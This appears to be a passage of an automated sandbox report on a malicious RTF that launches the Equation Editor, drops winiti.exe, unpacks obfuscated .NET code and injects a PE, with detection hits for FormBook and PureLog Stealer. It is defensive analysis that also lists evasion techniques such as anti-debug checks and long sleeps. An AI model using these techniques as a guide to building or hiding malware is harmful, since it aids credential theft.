                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: shfolder.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                Source: DzokrPQPdy.LNK.0.drLNK file: ..\..\..\..\..\Desktop\DzokrPQPdy.rtf
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\AppData\Roaming\winiti.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: Binary string: amWV.pdb source: EQNEDT32.EXE, 00000002.00000002.359904925.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, winiti.exe, 00000005.00000000.359489635.0000000000C72000.00000020.00000001.01000000.00000005.sdmp, winiti.exe.2.dr, winiti[1].exe.2.dr
                Source: Binary string: amWV.pdbSHA256 source: winiti.exe, 00000005.00000000.359489635.0000000000C72000.00000020.00000001.01000000.00000005.sdmp, winiti.exe.2.dr, winiti[1].exe.2.dr
                Source: Binary string: wntdll.pdb source: winiti.exe, winiti.exe, 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: amWV.pdbSHA256H! source: EQNEDT32.EXE, 00000002.00000002.359904925.00000000006D4000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                .NET source code contains method to dynamically call methods (often used by packers)
                Source: 5.2.winiti.exe.253505c.3.raw.unpack, VU5FiiciHrPuThVwBQ.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                Source: 5.2.winiti.exe.240000.0.raw.unpack, VU5FiiciHrPuThVwBQ.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                .NET source code contains potential unpacker
                Source: winiti[1].exe.2.dr, Form1.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                Source: winiti.exe.2.dr, Form1.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                Source: 5.2.winiti.exe.5150000.4.raw.unpack, zDIByBvZeeoTUlBtuI.cs.Net Code: snOBZDsoZ8 System.Reflection.Assembly.Load(byte[])
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00668F54 push eax; retf 2_2_00668F61
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0065F82A pushad ; iretd 2_2_0065F842
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0066871A push ds; retf 0007h2_2_0066871C
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_006652EA push ecx; retf 0007h2_2_006652EC
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_006601F4 push eax; retf 2_2_006601F5
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0066C6DA push ds; retf 2_2_0066C6DC
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_006724AA push es; retf 2_2_006724AC
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00401420 push es; retn 00F1h6_2_004014F8
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_0041F0DC push es; retf 6_2_0041F0E6
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00412104 pushad ; ret 6_2_0041212D
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_0040C1EA push edx; retf 6_2_0040C1EE
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00403260 push eax; ret 6_2_00403262
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00426263 push edi; iretd 6_2_0042626E
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00408271 push es; ret 6_2_00408272
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00413A0B push esi; retf 6_2_00413A0E
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00418A13 push ds; retf 2ECDh6_2_00418BEE
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00418355 push ebp; retf 6_2_004183DC
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00418BA5 push ebx; iretd 6_2_00418BA6
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_0041E653 push ds; iretd 6_2_0041E654
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_0041E63B push ebx; iretd 6_2_0041E64C
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_004187CA push ebp; ret 6_2_004187CB
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D8DFA1 push ecx; ret 6_2_00D8DFB4
                Source: winiti[1].exe.2.drStatic PE information: section name: .text entropy: 7.760978166314589
                Source: winiti.exe.2.drStatic PE information: section name: .text entropy: 7.760978166314589
                Source: 5.2.winiti.exe.253505c.3.raw.unpack, VU5FiiciHrPuThVwBQ.csHigh entropy of concatenated method names: 'fgoCtXMiTS', 'RgtTUJcyZL', 'g6aXCYEDSs', 'eQtXXHpHK1', 'kgQXo5WvMo', 'rl7XDVFHmZ', 'WdR9wPuHuepeI', 'q3Of0ljuF', 'dAnWKSXiW', 'NMlgX8j6G'
                Source: 5.2.winiti.exe.253505c.3.raw.unpack, cw37txoRO4X56hm21l.csHigh entropy of concatenated method names: 'X1lG3WCB9', 'Qh3mYfMwF', 'zninSfm9E', 'MDb9Ewmta', 'dHqv0oE1o', 'MvWcl4qrS', 'MXJ1VCDef', 'amJ6pCGsS', 'Iynw5Xgff', 'D1JUO7GYj'
                Source: 5.2.winiti.exe.240000.0.raw.unpack, VU5FiiciHrPuThVwBQ.csHigh entropy of concatenated method names: 'fgoCtXMiTS', 'RgtTUJcyZL', 'g6aXCYEDSs', 'eQtXXHpHK1', 'kgQXo5WvMo', 'rl7XDVFHmZ', 'WdR9wPuHuepeI', 'q3Of0ljuF', 'dAnWKSXiW', 'NMlgX8j6G'
                Source: 5.2.winiti.exe.240000.0.raw.unpack, cw37txoRO4X56hm21l.csHigh entropy of concatenated method names: 'X1lG3WCB9', 'Qh3mYfMwF', 'zninSfm9E', 'MDb9Ewmta', 'dHqv0oE1o', 'MvWcl4qrS', 'MXJ1VCDef', 'amJ6pCGsS', 'Iynw5Xgff', 'D1JUO7GYj'
                Source: 5.2.winiti.exe.5150000.4.raw.unpack, zDIByBvZeeoTUlBtuI.csHigh entropy of concatenated method names: 'YqZG3WZfoU', 'MJWG6UQrm1', 'BlQGrky7yt', 'vkTGQsyJoY', 'pVQGuMnV3v', 'UCvG9Faxpm', 'y2kGI2HM7H', 'zwbGvr4qKP', 'zENGL4O6ne', 'TBGGsmgcN9'
                Source: 5.2.winiti.exe.5150000.4.raw.unpack, QpyfwtBfq1mip1rA69.csHigh entropy of concatenated method names: 'ufQjINFj00', 'k45jvCTOkf', 'WKjjs1VL5w', 'wXvjR7LcS7', 'aOejfGpO8P', 'xVdjcgMYjm', 'BBNg38HtCFLXAi7NE9', 'DZWfXI6iRaiNNcunyW', 'BnojjVDJux', 'bw0jG5WTZn'
                Source: 5.2.winiti.exe.5150000.4.raw.unpack, iIG0lTjpxEHhOQvkFer.csHigh entropy of concatenated method names: 'HyJFl8i0dF', 'pY9FoalJ2C', 'YXNFZuvCpK', 'gBBFehNV3G', 'os2FJX2BQF', 'Gt8FMW0mEa', 'LaNFg1rS6B', 'ivAFH0j6Bf', 'Eu1FywVVXp', 'g8yF1h9yd0'
                Source: 5.2.winiti.exe.5150000.4.raw.unpack, g3uWXYxFNrFgfAVMbg.csHigh entropy of concatenated method names: 'Atr4sn5qik', 'NQG4RKODZr', 'ToString', 'QKX46Y1ZVt', 'uCq4rZKPV7', 'mhX4QeDgMS', 'b794uVdd6H', 'C5V49hb9hr', 'D9h4Ij5Vlm', 'v9a4voyumo'
                Source: 5.2.winiti.exe.5150000.4.raw.unpack, SM8r4X8fVbB7QJOWqS.csHigh entropy of concatenated method names: 'qKaZAClxf', 'fDZewjihY', 'EX6MEAvLr', 'jJygcp4d8', 'LIVy1JOiD', 'KkP1NXW1P', 's7FjWIgvkZQ8uOxcA5', 'sGKX7cMUQXquQDk8mW', 'vrTWnplwZWPtXk9fHO', 'c2Hwggjt9'
                Source: 5.2.winiti.exe.5150000.4.raw.unpack, raIl7X21rhHoQ1rmtr.csHigh entropy of concatenated method names: 'WFGw7LwYmy', 'CKZwi91L4Y', 'LOIwt8ZYXo', 'vOjwmA9TeZ', 'qFTwOyngwC', 'D4Dwdlo4jm', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 5.2.winiti.exe.5150000.4.raw.unpack, lcS7RE1vxlKWGpOeGp.csHigh entropy of concatenated method names: 'fjxuJCUCli', 'dq1ugTkcZZ', 'EJZQtHZv8D', 'u8iQm7fjBo', 'OsiQdgLBYT', 'Vk0Qn4e2ZN', 'g41QbOGAnA', 'crmQ0smGQj', 'TbgQkCV0e7', 'lrBQ5rmLQK'
                Source: 5.2.winiti.exe.5150000.4.raw.unpack, xFiqCjOS4mObwnqG7R.csHigh entropy of concatenated method names: 'EWef5wVsd5', 'xe6fKbwBF5', 'BugfOnUpLC', 'Tr4fhmj2e8', 'tFUfiw3ttv', 'YkRftnX2kA', 'flRfmMV13s', 'zrxfddUVsX', 'huMfnDADst', 'KeEfbtM9ml'
                Source: 5.2.winiti.exe.5150000.4.raw.unpack, Y56XpTEtPmCWtAUcx3.csHigh entropy of concatenated method names: 'U8pAH8qC9a', 'WokAyxrwL0', 'pVHA7wDedL', 'Bf0Ai2yNdm', 'nb8AmoaJP1', 'axnAdW0LNQ', 'MnMAbQqBYV', 'y2AA0G89VI', 'bLHA5DVVLb', 'CvaAPVhmyn'
                Source: 5.2.winiti.exe.5150000.4.raw.unpack, LQj0kcVZN6Kkvud9DR.csHigh entropy of concatenated method names: 'kBFw66mWtE', 'B7GwrZi6Hs', 'RyswQONdkA', 'NpTwuBdRYb', 'Ky4w98ov2t', 'QPJwIcU4LH', 'EXnwvV5Qp0', 'cjTwLFHLEs', 'V4wwsfDKcM', 'LGmwRtLJ7Z'
                Source: 5.2.winiti.exe.5150000.4.raw.unpack, bwrRjVyKj1VL5wCXv7.csHigh entropy of concatenated method names: 'iY1QeRlEfE', 'm5QQMY9dij', 'a8YQHnI8hN', 'lXYQyoXebK', 'aORQfrLs1B', 'yjtQc8VJGv', 'reLQ4K6HWa', 'pIOQwbduJF', 'ohrQF3L0hf', 'hZcQNBfeDd'
                Source: 5.2.winiti.exe.5150000.4.raw.unpack, H5DbcuXYjlGQPm0xJ0.csHigh entropy of concatenated method names: 'TIb4VdT1Zs', 'lsn4aIZ8Yc', 'WNcwpPSt2a', 'rnSwjmF1qY', 'g484PPCBwC', 'W9b4KFOl7d', 'RaV4EFNPE6', 'WWT4OYqenO', 'bkb4hoJiVW', 'b1e4qNRTCs'
                Source: 5.2.winiti.exe.5150000.4.raw.unpack, IcQdK2rXYfyvqYcyHa.csHigh entropy of concatenated method names: 'Dispose', 'RUTj2JsCi3', 'myp8iJBlW1', 'sxyRRK7glw', 'bbQjaj0kcZ', 's6Kjzkvud9', 'ProcessDialogKey', 'wRw8paIl7X', 'Frh8jHoQ1r', 'Itr88wKgcI'
                Source: 5.2.winiti.exe.5150000.4.raw.unpack, QoOP4PjGKS5gfhE57SM.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CqRNO2qJae', 'G9FNh3I2Q6', 'uKENqXoB2e', 'tSdNxrJjlJ', 'CacNS6aQwa', 'UqYNX9D6wT', 'EVsNTXaS2Y'
                Source: 5.2.winiti.exe.5150000.4.raw.unpack, qKgcIJaPN5xDIttQpD.csHigh entropy of concatenated method names: 'PhUFj2dX4W', 'rMPFGPNVBu', 'DieFBnJWiM', 'ohEF6jvGsm', 'j2yFrLss94', 'StLFudw3uP', 'HY8F9s9TbD', 'VwdwTdWKCp', 'AZ5wVEa7Lv', 'VmGw2q4NJb'
                Source: 5.2.winiti.exe.5150000.4.raw.unpack, hNFj00Hv45CTOkfqEI.csHigh entropy of concatenated method names: 'SfPrO1ssyo', 'NDPrhawp0e', 'y6irq2u9mD', 'bhYrx4PFV0', 'hFSrSDP4cF', 'NAOrXTfqy2', 'BUorTLsn5H', 'zTArVVaxqj', 'hfAr2On37F', 'N7Bra3OAps'
                Source: 5.2.winiti.exe.5150000.4.raw.unpack, Q8PlVd7gMYjm0S8vYt.csHigh entropy of concatenated method names: 'Bpq93aGmUj', 'wTb9rMKOoC', 'iEc9unbdAm', 'i7l9IxK5H5', 'WE19vTwTjM', 'o9duSioOL5', 'F7BuX3OclH', 'lMkuTfOuXB', 'rbUuVL16tg', 'BLWu25cIwA'
                Source: 5.2.winiti.exe.5150000.4.raw.unpack, OOABLIblxanx4dA8KG.csHigh entropy of concatenated method names: 'qy6I6v0QNP', 'UJ8IQvx2QP', 'U5VI9jiagd', 'F5i9aeIwTX', 'IXI9z4S0JK', 'wPHIpTNuN4', 'v3RIjSIcOj', 'TbfI8DkhQl', 'TRWIGOfZ1W', 'JxrIBmWZim'
                Source: 5.2.winiti.exe.5150000.4.raw.unpack, f3eVc2kPtPvNgZNKDL.csHigh entropy of concatenated method names: 'uYjIlyACNl', 'dglIoMtatC', 'JIEIZtIDvN', 'j5SIeI2paI', 'jcvIJofeoR', 'qqqIMkFXex', 'qHYIgkNh8t', 'nYQIHJPpp8', 'UIFIyVd8tV', 'RskI1u4ivF'
                Source: 5.2.winiti.exe.5150000.4.raw.unpack, XC3FVVqBJrFXgahDpX.csHigh entropy of concatenated method names: 'ToString', 'Q7hcPUyHH6', 'n2VciTvqHJ', 'DZActfCNLB', 'IrNcm0wRNs', 'LEbcd8cteg', 'YMEcnGOoEo', 'KF4cbxNwLp', 'uxvc0HdMAp', 'UDFckP4YiN'
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\winiti[1].exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\winiti.exeJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 180000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 2510000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 3E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 7EB0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 5420000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 8EB0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 5720000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00DD0101 rdtsc 6_2_00DD0101
                Source: C:\Users\user\AppData\Roaming\winiti.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1812Thread sleep time: -180000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exe TID: 3144Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exe TID: 3196Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3288Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00DD0101 rdtsc 6_2_00DD0101
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00417A03 LdrLoadDll,6_2_00417A03
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D700EA mov eax, dword ptr fs:[00000030h]6_2_00D700EA
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D70080 mov ecx, dword ptr fs:[00000030h]6_2_00D70080
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D926F8 mov eax, dword ptr fs:[00000030h]6_2_00D926F8
                Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Injects a PE file into a foreign processes
                Source: C:\Users\user\AppData\Roaming\winiti.exeMemory written: C:\Users\user\AppData\Roaming\winiti.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe" Jump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeQueries volume information: C:\Users\user\AppData\Roaming\winiti.exe VolumeInformationJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 6.2.winiti.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.winiti.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.453259452.0000000000140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.453324257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Yara detected PureLog Stealer
                Source: Yara matchFile source: 5.2.winiti.exe.240000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.winiti.exe.240000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.winiti.exe.253505c.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.winiti.exe.253505c.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.366993516.0000000000240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
